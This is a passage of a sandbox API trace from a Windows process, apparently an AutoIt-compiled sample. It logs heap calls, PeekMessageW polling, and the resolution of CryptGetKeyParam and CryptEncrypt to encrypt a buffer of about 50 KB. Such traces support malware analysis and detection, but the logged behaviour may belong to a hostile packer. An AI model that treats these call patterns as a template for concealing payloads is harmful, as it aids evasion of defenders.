Size=0x10) returned 0x9ba0f0 [0175.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0175.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0175.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0175.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0175.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0175.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0175.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0175.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0175.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0175.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0175.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0175.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0175.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0175.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0175.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0175.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0175.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0175.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0175.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0175.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0175.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0175.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0175.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0175.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0175.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0175.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0175.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.552] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0175.553] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c26f8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26f8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0175.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0175.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0175.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0175.555] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0175.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0175.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0175.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0175.671] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0175.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0175.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0175.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0175.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0175.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0175.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0175.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0175.672] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.672] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.672] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.672] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.673] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.673] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.673] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0175.673] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.673] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.673] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0175.673] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.673] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.673] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0175.673] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.673] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.673] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.673] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.674] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.674] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.674] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.674] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.674] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.675] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.675] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xc3fc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xc400) returned 1 [0175.676] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.676] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.676] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.676] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.676] CharLowerBuffW (in: lpsz="byte[50177]", cchLength=0xb | out: lpsz="byte[50177]") returned 0xb [0175.676] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.677] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.677] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.677] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9d5188*, pdwDataLen=0x87e820*=0xc3fc, dwBufLen=0xc400 | out: pbData=0x9d5188*, pdwDataLen=0x87e820*=0xc400) returned 1 [0175.678] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.678] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.678] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.678] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.678] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.678] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.678] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0175.678] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.678] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0175.678] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.678] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.678] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.678] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.678] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0175.678] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.678] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.678] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.682] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.682] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.682] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.687] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.687] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.688] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0175.688] PeekMessageW (in: lpMsg=0x87f04c, 